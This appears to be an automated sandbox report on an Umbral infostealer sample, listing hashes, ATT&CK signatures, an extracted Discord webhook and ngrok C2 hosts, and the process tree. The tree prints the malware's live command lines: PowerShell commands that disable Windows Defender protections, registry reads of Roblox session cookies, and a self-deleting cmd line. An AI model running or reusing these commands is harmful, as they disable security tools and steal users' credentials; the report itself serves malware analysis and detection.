Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
13-01-2025 02:10
Static task
static1
Behavioral task
behavioral1
Sample
331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe
Resource
win7-20241023-en
General
-
Target
331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe
-
Size
128KB
-
MD5
4c8044c83f60465eae3cc16d7c858085
-
SHA1
bc837ba36a8f244283483210215a11607f05fb63
-
SHA256
331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8
-
SHA512
f4783ae1591dafc44b1731c34dfced82e5285099a4066b6492e063b1ca5edb4a0916fcad0617b38c0fc754c304d932879cf3014bfce83c0b9a7219f8bc737432
-
SSDEEP
3072:oRt4KXzdjBFUxzV4NsFYGvL9JjyVcUuyTRc8R:q4gRjBF4SKFYMLbjxUBRc8
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000016875-12.dat family_umbral behavioral1/memory/1952-15-0x0000000000BD0000-0x0000000000C10000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1900 powershell.exe 848 powershell.exe 1384 powershell.exe 768 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts MoonHub.exe -
Executes dropped EXE 2 IoCs
pid Process 1904 6z2guuz0ldkdgc1o.exe 1952 MoonHub.exe -
Loads dropped DLL 1 IoCs
pid Process 1720 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 53 0.tcp.eu.ngrok.io 87 0.tcp.eu.ngrok.io 91 0.tcp.eu.ngrok.io 5 0.tcp.eu.ngrok.io 13 0.tcp.eu.ngrok.io 16 discord.com 17 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2244 cmd.exe 2188 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1668 wmic.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings rundll32.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2188 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1952 MoonHub.exe 1900 powershell.exe 1384 powershell.exe 768 powershell.exe 2732 powershell.exe 848 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1960 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1904 6z2guuz0ldkdgc1o.exe Token: SeDebugPrivilege 1952 MoonHub.exe Token: SeIncBasePriorityPrivilege 1904 6z2guuz0ldkdgc1o.exe Token: SeIncreaseQuotaPrivilege 2724 wmic.exe Token: SeSecurityPrivilege 2724 wmic.exe Token: SeTakeOwnershipPrivilege 2724 wmic.exe Token: SeLoadDriverPrivilege 2724 wmic.exe Token: SeSystemProfilePrivilege 2724 wmic.exe Token: SeSystemtimePrivilege 2724 wmic.exe Token: SeProfSingleProcessPrivilege 2724 wmic.exe Token: SeIncBasePriorityPrivilege 2724 wmic.exe Token: SeCreatePagefilePrivilege 2724 wmic.exe Token: SeBackupPrivilege 2724 wmic.exe Token: SeRestorePrivilege 2724 wmic.exe Token: SeShutdownPrivilege 2724 wmic.exe Token: SeDebugPrivilege 2724 wmic.exe Token: SeSystemEnvironmentPrivilege 2724 wmic.exe Token: SeRemoteShutdownPrivilege 2724 wmic.exe Token: SeUndockPrivilege 2724 wmic.exe Token: SeManageVolumePrivilege 2724 wmic.exe Token: 33 2724 wmic.exe Token: 34 2724 wmic.exe Token: 35 2724 wmic.exe Token: SeIncreaseQuotaPrivilege 2724 wmic.exe Token: SeSecurityPrivilege 2724 wmic.exe Token: SeTakeOwnershipPrivilege 2724 wmic.exe Token: SeLoadDriverPrivilege 2724 wmic.exe Token: SeSystemProfilePrivilege 2724 wmic.exe Token: SeSystemtimePrivilege 2724 wmic.exe Token: SeProfSingleProcessPrivilege 2724 wmic.exe Token: SeIncBasePriorityPrivilege 2724 wmic.exe Token: SeCreatePagefilePrivilege 2724 wmic.exe Token: SeBackupPrivilege 2724 wmic.exe Token: SeRestorePrivilege 2724 wmic.exe Token: SeShutdownPrivilege 2724 wmic.exe Token: SeDebugPrivilege 2724 wmic.exe Token: SeSystemEnvironmentPrivilege 2724 wmic.exe Token: SeRemoteShutdownPrivilege 2724 wmic.exe Token: SeUndockPrivilege 2724 wmic.exe Token: SeManageVolumePrivilege 2724 wmic.exe Token: 33 2724 wmic.exe Token: 34 2724 wmic.exe Token: 35 2724 wmic.exe Token: SeDebugPrivilege 1900 powershell.exe Token: SeDebugPrivilege 1384 powershell.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeIncreaseQuotaPrivilege 408 wmic.exe Token: SeSecurityPrivilege 408 wmic.exe Token: SeTakeOwnershipPrivilege 408 wmic.exe Token: SeLoadDriverPrivilege 408 wmic.exe Token: SeSystemProfilePrivilege 408 wmic.exe Token: SeSystemtimePrivilege 408 wmic.exe Token: SeProfSingleProcessPrivilege 408 wmic.exe Token: SeIncBasePriorityPrivilege 408 wmic.exe Token: SeCreatePagefilePrivilege 408 wmic.exe Token: SeBackupPrivilege 408 wmic.exe Token: SeRestorePrivilege 408 wmic.exe Token: SeShutdownPrivilege 408 wmic.exe Token: SeDebugPrivilege 408 wmic.exe Token: SeSystemEnvironmentPrivilege 408 wmic.exe Token: SeRemoteShutdownPrivilege 408 wmic.exe Token: SeUndockPrivilege 408 wmic.exe Token: SeManageVolumePrivilege 408 wmic.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1960 AcroRd32.exe 1960 AcroRd32.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 1720 wrote to memory of 1904 1720 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe 30 PID 1720 wrote to memory of 1904 1720 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe 30 PID 1720 wrote to memory of 1904 1720 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe 30 PID 1720 wrote to memory of 1984 1720 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe 31 PID 1720 wrote to memory of 1984 1720 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe 31 PID 1720 wrote to memory of 1984 1720 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe 31 PID 1720 wrote to memory of 1952 1720 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe 32 PID 1720 wrote to memory of 1952 1720 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe 32 PID 1720 wrote to memory of 1952 1720 331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe 32 PID 1952 wrote to memory of 2724 1952 MoonHub.exe 35 PID 1952 wrote to memory of 2724 1952 MoonHub.exe 35 PID 1952 wrote to memory of 2724 1952 MoonHub.exe 35 PID 1952 wrote to memory of 2512 1952 MoonHub.exe 37 PID 1952 wrote to memory of 2512 1952 MoonHub.exe 37 PID 1952 wrote to memory of 2512 1952 MoonHub.exe 37 PID 1952 wrote to memory of 1900 1952 MoonHub.exe 39 PID 1952 wrote to memory of 1900 1952 MoonHub.exe 39 PID 1952 wrote to memory of 1900 1952 MoonHub.exe 39 PID 1952 wrote to memory of 1384 1952 MoonHub.exe 41 PID 1952 wrote to memory of 1384 1952 MoonHub.exe 41 PID 1952 wrote to memory of 1384 1952 MoonHub.exe 41 PID 1952 wrote to memory of 768 1952 MoonHub.exe 43 PID 1952 wrote to memory of 768 1952 MoonHub.exe 43 PID 1952 wrote to memory of 768 1952 MoonHub.exe 43 PID 1984 wrote to memory of 1960 1984 rundll32.exe 45 PID 1984 wrote to memory of 1960 1984 rundll32.exe 45 PID 1984 wrote to memory of 1960 1984 rundll32.exe 45 PID 1984 wrote to memory of 1960 1984 rundll32.exe 45 PID 1952 wrote to memory of 2732 1952 MoonHub.exe 46 PID 1952 wrote to memory of 2732 1952 MoonHub.exe 46 PID 1952 wrote to memory of 2732 1952 MoonHub.exe 46 PID 1952 wrote to memory of 408 1952 MoonHub.exe 48 PID 1952 wrote to memory of 408 1952 MoonHub.exe 48 PID 1952 wrote to memory of 408 1952 MoonHub.exe 48 PID 1952 wrote to memory of 2576 1952 MoonHub.exe 50 PID 1952 wrote to memory of 2576 1952 MoonHub.exe 50 PID 1952 wrote to memory of 2576 1952 MoonHub.exe 50 PID 1952 wrote to memory of 956 1952 MoonHub.exe 52 PID 1952 wrote to memory of 956 1952 MoonHub.exe 52 PID 1952 wrote to memory of 956 1952 MoonHub.exe 52 PID 1952 wrote to memory of 848 1952 MoonHub.exe 54 PID 1952 wrote to memory of 848 1952 MoonHub.exe 54 PID 1952 wrote to memory of 848 1952 MoonHub.exe 54 PID 1952 wrote to memory of 1668 1952 MoonHub.exe 56 PID 1952 wrote to memory of 1668 1952 MoonHub.exe 56 PID 1952 wrote to memory of 1668 1952 MoonHub.exe 56 PID 1952 wrote to memory of 2244 1952 MoonHub.exe 58 PID 1952 wrote to memory of 2244 1952 MoonHub.exe 58 PID 1952 wrote to memory of 2244 1952 MoonHub.exe 58 PID 2244 wrote to memory of 2188 2244 cmd.exe 60 PID 2244 wrote to memory of 2188 2244 cmd.exe 60 PID 2244 wrote to memory of 2188 2244 cmd.exe 60 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2512 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe"C:\Users\Admin\AppData\Local\Temp\331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"C:\Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\resemble.py2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\resemble.py"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"3⤵
- Views/modifies file attributes
PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MoonHub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2576
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:848
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1668
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2188
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
231KB
MD5f70b5e56a09af292d4e909c547f9c8c0
SHA1577883bdbe8dc9582e15e7a1212b1fe432bafce3
SHA2568fd22c5acb3144dbaa5ab3f9dd5901eb6f3beef67e72ea431246c6a790c067de
SHA512e54ccb56aa6473abd3530493933d5164f2dff02076e0f03443382f02d177a52e318d8d0f432e6a3fb5620eaffd09f2dbf6ccbf9698ba149b149c594fa162d879
-
Filesize
27KB
MD523f1fabaef532d89fcb6d5bb14a36ef3
SHA1679a82ed172d49f298bf07b6fa0de9b6c2ce0046
SHA256e4410bc67b1ee8af2df456713b85040917b8cf749fb7d660feeb625b25ec9c51
SHA51296e2baa6ce0220b9ad167b60220c683d5b080a9ba9a2e4d320aae6989f4aa2d241f8078e69bdd2da39a20d9b57ae84240da912d29e5e1db36cc90cf6a0537458
-
Filesize
3KB
MD51208d06db9ac19a4d7fbee4b358280b9
SHA10ecb7afcc480d29206e35eb61784ac887e64a422
SHA2567e88f2b3574e097b2d4ca81685f7932dc64233f3fd5422ec5e0f6c0480a5944b
SHA5126016e64c5fe01a754205e954ca14434845f14edbf247f76560365f261d60934ebeaa34ee9500c10c86d387b207fb0c5e752174f8b475f1dd80ece740334b3045
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b3db901f68a98cea5538af4fd9dfc379
SHA197ede22318e0a8790c840e3ccbee8dd4bf8e2e1c
SHA25617684924582a2c1b9767d881ecf1821877f27e7bf1681d5a843c20d1e8c99597
SHA51215675d68a7c17abd79d737932b723bedc19673459da78dd021441a9f98cf2480fde2ed3673b62e8602c6e6e38202bd60eaad5e9df6af69bd7e99be1d1f034fd5
-
Filesize
45KB
MD58c7d2f0a936dbe6d0899d40171ffb668
SHA10b22fcd904f3b0fa2555a32a2635423668fc4616
SHA25685f5f5acb54c30efd4f84c0f11c834b7dab98c5bb7357bddcd29fbe5babc4db6
SHA512463a48ec2752fd002e82dfe555abd03fc666a523da99e0e848788eeff6f98d06d36a360cfd7ad70d342bb4c90a49131a3428f1404d17e04a7fe5a1022c1faa65